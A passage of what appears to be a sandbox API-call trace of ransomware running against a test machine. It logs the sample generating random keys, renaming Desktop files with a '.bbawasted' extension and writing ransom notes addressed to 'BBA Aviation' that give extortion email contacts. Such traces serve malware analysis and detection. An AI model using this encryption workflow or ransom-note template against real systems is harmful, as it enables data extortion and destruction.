nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0202.916] SetEndOfFile (hFile=0x288) returned 1 [0202.919] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0202.919] CloseHandle (hObject=0x288) returned 1 [0202.924] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0202.924] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac678 | out: hHeap=0x660000) returned 1 [0202.924] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6708) returned 1 [0202.925] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0202.925] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0202.925] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\0PrNu4iKjV-La9s-.png") returned 48 [0202.925] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x6aecf0 [0202.926] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0202.926] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0202.926] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6460) returned 1 [0202.926] CryptGenRandom (in: hProv=0x6a6460, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0202.926] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0202.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\0PrNu4iKjV-La9s-.png.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\0prnu4ikjv-la9s-.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0203.337] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0203.338] SetEndOfFile (hFile=0x290) returned 1 [0203.541] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.541] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0203.541] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0203.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\0PrNu4iKjV-La9s-.png" (normalized: "c:\\users\\fd1hvy\\desktop\\0prnu4ikjv-la9s-.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\0PrNu4iKjV-La9s-.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\0prnu4ikjv-la9s-.png.bbawasted")) returned 1 [0203.681] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\0PrNu4iKjV-La9s-.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\0prnu4ikjv-la9s-.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0203.681] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0203.682] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x13a4f [0203.682] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a4f) returned 0x640000 [0203.682] CloseHandle (hObject=0x27c) returned 1 [0203.690] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0203.691] CloseHandle (hObject=0x288) returned 1 [0203.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0203.691] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6570) returned 1 [0203.692] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0203.692] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0203.692] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a65f8) returned 1 [0203.693] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0203.693] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0203.706] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0203.706] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0203.706] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0203.706] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Bid3ZS1h0Wuyo06v3VxiEiyXdbt4kliG6rRbyvHR7z25o7o1fTJedCSCPuIEiz/5\r\nNwD0plW0VkcGD6iY/TldsjrZZJm8JVCIXZNnz78w0ep0bhJ6SvWwONtvVcP3Qvt5\r\nR28yWyFcAIwoPOIa9qAR4n7u4TQPcoHPkp5pKpATxyrCBSkSSQkQiQJ8KqqzThkA\r\nVdophILSYoFJT4GJ87Y6AOW/sk9UL08Iuc6eIK2mD8e0mhsidCjad+5Q/vYsLTvx\r\n2CkhMnmCNDboYdnS1SnVHBn1/6Ust9uKEYhQABr/5/z3ChrxR17bgOLqngl/lpUh\r\nUrqa+f7MhoubvMTNnpVJWoS406/L2xcg+IUbdfMKLiovxagmxuD9RnHA5dYvGyZg\r\nKfqK7Jy38bk/iISLi0M8PS+0E1HIDzpASuPHIE0t6eGa2ZBXziKdP3lEwRP0v8Xz\r\ngbERto6Ad/wnseiFjmVDsaTiT0wOdJTT4atp4Wb+UMu6JR0ejpUVLs4IaiuMARPG\r\nYFxPMddnmF0eYVxQf9O9HBQy0eARAHWRO5xrg23qBOd/or1iy0YdOc8s1UrnhIfQ\r\nEZf1SeGscmwZlIVrK+Gzk9D3tiUPfn3QDMUzoBhiMWO1XRhHyuZubcBxUgTrTrUR\r\nzZ7RVi+JsdZTL6yH07Ei+C0Neq76H0SGFcJnvAuvvNS=[end_key]\r\nKEEP IT\r\n") returned 984 [0203.706] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0203.706] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0203.706] SetEndOfFile (hFile=0x290) returned 1 [0203.709] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0203.709] CloseHandle (hObject=0x290) returned 1 [0203.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0203.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a22b8 | out: hHeap=0x660000) returned 1 [0203.712] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6b48) returned 1 [0203.713] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0203.713] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0203.713] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\4W2-HxdmmPUru.mp4") returned 45 [0203.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x264) returned 0x6aecf0 [0203.713] lstrcpyW (in: lpString1=0x6aed4a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0203.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0203.713] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6240) returned 1 [0203.714] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0203.714] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0203.714] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\4W2-HxdmmPUru.mp4.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\4w2-hxdmmpuru.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0203.714] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0203.716] SetEndOfFile (hFile=0x290) returned 1 [0203.716] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0203.716] lstrcpyW (in: lpString1=0x6aed4a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0203.716] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\4W2-HxdmmPUru.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\4w2-hxdmmpuru.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\4W2-HxdmmPUru.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\4w2-hxdmmpuru.mp4.bbawasted")) returned 1 [0203.717] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\4W2-HxdmmPUru.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\4w2-hxdmmpuru.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0203.718] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0203.718] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xe075 [0203.718] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe075) returned 0x640000 [0203.718] CloseHandle (hObject=0x288) returned 1 [0203.723] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0203.724] CloseHandle (hObject=0x27c) returned 1 [0203.724] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0203.724] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5f98) returned 1 [0203.725] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0203.725] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0203.725] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6240) returned 1 [0203.726] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0203.726] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0203.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0203.829] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0203.829] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0203.829] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]mgQgTR2u08Bvr7fh3Li2e2lNe2j/imV9I8b2H3AcXlDA3piZUDA4M3vnvYg17mn6\r\nIDuLQeI9kn6HMQpu1pSzvUJPF25FbdLT7wTDBWx3ySNOGMwbWYqdxK3Vvem5iegP\r\nR2ypf7E+YnISH9J2kZd4sY1oeYH5bCtk8ibRw2+5Wce+emtBVYPWP+fI+0LzIixu\r\nyu1lxO5Hk/Lr8lbjt2kTZlQspvX4yk0mjm7/k1SVSa5rOTdLuKpRfWY2957nIrfC\r\n5wjCQyFGERGqTMDh3qh9+Cqjt8BQVELfcnWyMjZULXoDegFLqkcNxB4SO+lX9/k2\r\n6akldGugjPr75eWUlK/Q2i9tv2zB4SU5SVchQ6uPPGx3bIZCZGnFyV4ny0qDVlAq\r\nKaEqRneTENlPbZtNFtCrgIgomJDYyAUO8FwcFpWZrvw339cVVN76jGB4BdCcIdwP\r\nDCyDu6VyDK3l5HOmDf9wD5OWKZh0C8bsdTGOvsz1XMz/92/10tpaZbp0msqj2kt1\r\nR43xL5Hy1gf2hhPFCNWqBu/T3EDz+pDXmMomo0fZnJZB9Enanr74jPDcTVxDrnyz\r\nJurm1KKbmkCFx1qIUEXji6Dag9FjHubFwGNxv8r9YTP66TRGkhghB4Nq7nvK+7xp\r\nADLM4ZcEnvPxKVkgFpb3MCUoIOluyeBJlEym44IC8a0=[end_key]\r\nKEEP IT\r\n") returned 984 [0203.829] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0203.829] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0203.829] SetEndOfFile (hFile=0x290) returned 1 [0204.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0204.179] CloseHandle (hObject=0x290) returned 1 [0204.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0204.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb58 | out: hHeap=0x660000) returned 1 [0204.417] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a5e88) returned 1 [0204.417] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0204.418] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0204.418] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\2VSAU-Hov2q8BSqn.swf") returned 53 [0204.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6aecf0 [0204.418] lstrcpyW (in: lpString1=0x6aed5a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0204.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0204.418] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6708) returned 1 [0204.418] CryptGenRandom (in: hProv=0x6a6708, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0204.418] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0204.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\2VSAU-Hov2q8BSqn.swf.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\2vsau-hov2q8bsqn.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0204.419] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0204.424] SetEndOfFile (hFile=0x27c) returned 1 [0204.424] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.425] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0204.425] lstrcpyW (in: lpString1=0x6aed5a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0204.425] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\2VSAU-Hov2q8BSqn.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\2vsau-hov2q8bsqn.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\2VSAU-Hov2q8BSqn.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\2vsau-hov2q8bsqn.swf.bbawasted")) returned 1 [0204.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\2VSAU-Hov2q8BSqn.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\2vsau-hov2q8bsqn.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0204.426] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0204.426] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x3b3b [0204.426] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b3b) returned 0x640000 [0204.426] CloseHandle (hObject=0x280) returned 1 [0204.432] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0204.433] CloseHandle (hObject=0x288) returned 1 [0204.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0204.433] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6c58) returned 1 [0204.433] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0204.433] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0204.433] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a60a8) returned 1 [0204.434] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0204.434] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0204.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0204.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0204.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0204.444] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]TcA7Z0lyCV4yrBWVYGL2GbSbzTchviT+2L9ciME7fNmcHchHKKs8pZWQJGReXza2\r\njl7bH+ycfYtTRujsdBWir6DvjMh4xxp5Snk6492sdOkolRcqkibkfFG9ZNKDxKiL\r\nJ7TgTIhN2AY2tqAVWURQSXzie4tr7DGORG7BwvuoOaK72xfPdvfT6L8/HgdOtUek\r\nsT0Y7G6vSlIiddSy/QDUWsoa7XhQRyWmCVJPA7io8hrSnT+8FYjwrzDaUTyZzU7D\r\nG3hStfvL85uG7SXIsLFt2IRKvNuPmBgGZYceq1je01xHBvxEI5dm+yCJxrnMgAx8\r\nH0wcp+9fZ35/QYtqgElz1DFE2olBd+xFNyvFONEh25iW1BOqd9v5eMDvV+2vj8gR\r\nZMj90HonHWu53YQ4PGaRcHotJEKYrlQgVZUkgPe4Aq9+1/GYMBHSv0v2ePYJBDgB\r\nEcSSJtI66HjztavAHV7njh+2km712ATcusCqYCGTH4hjk/qyT8HCbo/YVbjMgYnB\r\nVgrULPhqiPZHrkhqpSPjeKLNnyNEyO8837F7vJKBjjboHnpcNSXBGnxbRP6wdY0i\r\nYcB2l5/EJb8CkBIWmcH/lxvhMPNAKWP+dGE+XFQy1oKs78r+4rYniMaajCx/VF2u\r\nb9grNfV0WgMwgSxQEJlH4JHIjWClJBj/V0GjBqTIJmL=[end_key]\r\nKEEP IT\r\n") returned 984 [0204.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0204.444] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0204.444] SetEndOfFile (hFile=0x27c) returned 1 [0204.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0204.447] CloseHandle (hObject=0x27c) returned 1 [0204.452] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0204.452] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x660000) returned 1 [0204.452] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6928) returned 1 [0204.453] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0204.453] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0204.453] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\hGz18Fu.mkv") returned 44 [0204.453] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x262) returned 0x6aecf0 [0204.453] lstrcpyW (in: lpString1=0x6aed48, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0204.453] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0204.453] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5f98) returned 1 [0204.454] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0204.454] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0204.454] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\hGz18Fu.mkv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\hgz18fu.mkv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0204.455] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0204.456] SetEndOfFile (hFile=0x27c) returned 1 